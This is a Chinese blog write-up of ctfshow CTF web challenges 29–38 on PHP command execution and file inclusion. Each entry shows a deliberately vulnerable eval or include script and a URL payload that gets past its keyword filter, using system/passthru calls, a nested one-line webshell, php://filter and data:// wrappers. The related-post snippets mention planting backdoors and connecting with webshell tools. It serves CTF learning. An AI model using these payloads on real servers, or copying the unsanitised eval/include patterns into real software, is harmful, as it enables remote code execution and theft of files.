ctf 命令执行

已于 2023-04-01 18:06:09 修改
阅读量283 收藏
点赞数 1
文章标签: php 开发语言
于 2023-04-01 12:08:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74427106/article/details/129894222
版权

什么是命令执行漏洞:命令执行漏洞就是服务器端没有对客户的一些命令进行过滤,导致客户任意拼接命令使网站进行执行;

ctfshow web入门29

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了flag所以我们只要命令里不出现flag即可所以构造

?c=system('cat fla?.php');

运行后打开源码后即可得到flag

web30

代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了system

那构造

?c=passthru('cat fla*');

运行之后查看源码即可得到flag

web31

代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

先分析代码发现过滤了.和空格

这里我会个一句话木马

构造

?c=eval($_GET[1]);&1=system('tac flag.php');

web32

代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
?c=include$_POST[a]?>
post a=php://filter/read=convert.base64-encode/resource=flag.php

这里我不知道为啥不能用一句话木马,后续知道了在补充;

web33

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

直接构造

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

web34

代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 04:21:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

与上题一样

web35

代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 04:21:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

加了一些过滤不影响和上题一样

web36

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

过滤了数字与上题相似只是多了一个数字同上

web37

代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

过滤了flag并且用include文件包含我第一先想到php协议但不知道为啥使不成

那就用data协议

?c=data://text/plain,<?php system("tac f*");
?c=data://text/plain,<?php%20system("tac%20f*");?>

web38

代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

过滤了php,可以使用base64编码进行输出

亲手擦亮那星
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
命令执行漏洞之CTF
qq_46085232的博客
07-09 401
命令执行漏洞之CTF[ACTF2020 新生赛]Exec[GXYCTF2019]Ping Ping Ping总结 作为菜鸟的我,开始想通过玩玩ctf,加深自己对漏洞的理解,和掌握一些绕过的思路。真的很好玩 [ACTF2020 新生赛]Exec 这是我做的第一道有关命令执行的题。(题目简单,就不贴图了) 1.通过标题,和一进去的ping的页面,就知道这里考的是命令执行,又因为这里是新生赛,难度也不大 2.通过我所学的知识,用‘;ls’,查看当前目录,然后就行通过echo写入一句话后门,也成功写入。用蚁剑连接,
CTF-命令执行漏洞
Reaches_r的博客
08-10 189
如以下靶机
CTF-命令执行【超详细】
2401_84578953的博客
05-17 600
当应用需要调用一些外部应用程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意命令到正常命令中,造成命令执行攻击。调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到。
CTF命令执行漏洞(python)
weixin_46184517的博客
04-19 1172
1. 打开环境,页面有两个按钮,分别为‘选择文件’&&‘上传’ 2. 右键检查页面源代码,提示会将上图的文件当作python代码执行,只允许上传‘jpg’&&‘png’为后缀的图片 3. 我们新建一个txt文件,将python代码写入文件 (1)为什么要执行import os? 我们在python下写程序,需要对文件以及文件夹或者其他的进行一系列的操作。但是,我们怎么在python中对文件进行操作呢?这就引入了os模块了。 例如: os.name返回当前系统 os.getc
ctf命令执行漏洞(一)
wlllllianqing的博客
10-12 2064
命令执行漏洞原理 命令执行漏洞,就是指用户通过浏览器或其他辅助程序提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,用户可以提交恶意语句并交由服务器执行。 在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。 相关函数 ...
网络安全CTF系列培训教程之Web篇-命令执行漏洞
最新发布
ctfayang的博客
07-05 473
命令执行漏洞就是黑客可以直接在web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
CTF神器_ctf
09-23
3. **获取Webshell**:通过扫描找到可以写入的目录,上传恶意脚本,获取远程命令执行的通道。 4. **验证漏洞**:找到疑似漏洞后,使用Dirsearch验证它们是否真实有效。 5. **了解网站结构**:对于理解网站的架构和...
php突破命令限制执行系统命令
05-09
php突破命令限制执行系统命令 可以用于ctf 实战 等多领域使用 十分实用,可以用于突破system等命令被限制的时候
命令注入讲解ppt.pptx
08-10
命令执行漏洞不仅存在于 B/S 架构中,也存在于 C/S 架构中。本次讨论的都是 Web 中的命令执行漏洞。 命令注入攻击最初被关注到,是 Shell 命令注入攻击(所以最初也被称为 Shell 命令注入攻击),由挪威一名程序员...
CTF AWD工具
10-07
在AWD场景下,参赛者可能需要控制目标服务器,蚁剑提供了一个方便的界面来执行命令、上传下载文件等操作,增强了攻击和防御的能力。 最后,"WebShellKill_Seay" 是一款专门用于检测和清除Webshell的工具。Webshell...
CTFer成长之路之命令执行漏洞
2302_76827504的博客
04-27 154
转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。路由器管理台经常存在的网络ping测试,开发者常常会禁用大量的恶意字符串,试试看如何绕过呢?由于docker是没有bash、python程序的,并且sh反弹是不行的。
CTF-命令执行
su__xiaoyan的博客
01-18 608
命令执行漏洞 当应用需要调用一些外部应用程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意命令到正常命令中,造成命令执行攻击。 调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有多虑用户输入的情况下,就会造成命令执行漏洞。 实验环境 攻击机:192.168.0.25 靶机:192.168.0.26 实验流程 端口扫描 8080端口开放,HTTP服务
命令执行漏洞(教材:从零到一 CTFer成长之路)
L2329794714的博客
03-18 5661
一、什么是命令执行漏洞 由于开发者使用一些执行命令函数其未对用户输入的数据进行安全检查时,可注入恶意命令,实现恶意命令执行命令执行一般发生在远程,故称远程命令执行RCE(Remote Command Exec或Remote Code Exec)。 以PHP的syste()函数为例: <?php $str = $_GET['name']; system("echo hello ".$str); //调用系统程序执行命令 ?> 正常输入?name=lusong,
命令执行漏洞
Jim的博客
09-29 1103
CTF下的命令执行
Lemon's blog
04-28 9527
前言: 之前学习过命令执行,但不是太深入,这次通过题目的训练来深入学习一下命令执行
CTF命令执行漏洞的一些杂七杂八的笔记
chizhaji的博客
02-06 2070
CTF命令执行漏洞的一些杂七杂八的笔记 命令执行漏洞主要是由system、exec、shell_exec,eval等函数能把用户输入的内容当作是命令来执,反引号一般的作用是与system类似,都是把内容作为命令执行。//不过在这些命令执行函数里面,只有system是有回显的,其他的函数都需要搭配着echo来使用 关于过滤的一些笔记 一般看到有过滤的我都会直接先用echo "npfs "; include($_GET['url']); ?>&url=php://filter/read=conv
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值